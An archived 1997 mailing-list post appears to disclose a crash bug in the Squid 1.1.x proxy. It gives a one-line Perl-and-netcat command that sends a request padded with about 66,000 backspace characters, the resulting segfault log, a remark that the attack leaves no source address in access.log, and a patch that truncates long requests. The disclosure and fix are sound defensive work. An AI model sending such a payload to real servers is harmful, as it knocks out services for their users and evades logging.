perl -e 'print "GET http://somehost.net/", ("\010" x 66000),"\n\n"'
|netcat myhost 3128
Almost instant crash for squid-1.1.15 and .18 on Linux2.0.29 and FreeBSD2.2.5R
Lines from cache.log:
97/12/09 14:08:57| clientReadRequest: FD 23 Invalid Request
97/12/09 14:08:57| ERR_INVALID_REQUEST: GET http://____/^H^H^H^H^H^H^H^H^H^H^H
^^^ in fact, almost 66K "\010"s
97/12/09 14:08:57| WARNING: FD 23: A comm_write is already active.
FATAL: Received Segment Violation...dying.
97/12/09 14:08:57| storeWriteCleanLog: Starting...
97/12/09 14:08:57| 4096 lines written so far.
97/12/09 14:08:58| 8192 lines written so far.
97/12/09 14:08:58| 12288 lines written so far.
97/12/09 14:08:58| Finished. Wrote 13992 lines.
97/12/09 14:08:58| Took 1 seconds (13992.0 lines/sec).
CPU Usage: user 8 sys 5
It looks like squid dies in _db_print while trying to vsprintf too long line
into BUFSIZ array.
While LOCAL_ARRAY expands to "static char f[BUFSIZ]" and not to stack variable,
I wonder if it is possible to exploit this bug/feature and execute machine code
(even with non-root access).
There is no corresponding line in access.log, so this kind of attack
leaves no traces of source address (please correct me if I'm wrong)
(default debug flags assumed)
Simple patch for .18 follows:
*** icp.c.orig Fri Oct 31 18:41:14 1997
--- icp.c Mon Dec 15 14:34:04 1997
***************
*** 1808,1813 ****
--- 1808,1816 ----
0);
} else {
/* parser returned -1 */
+ /* 15-12-97 chop wrong request to avoid buffer overflow */
+ if(strlen(icpState->inbuf) > 1024) icpState->inbuf[1023] = '\0';
+ /* now we're relatively safe to print diags */
debug(12, 1, "clientReadRequest: FD %d Invalid Request\n", fd);
wbuf = squid_error_request(icpState->inbuf,
ERR_INVALID_REQ,
Received on Mon Dec 15 1997 - 04:22:07 MST
This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:37:57 MST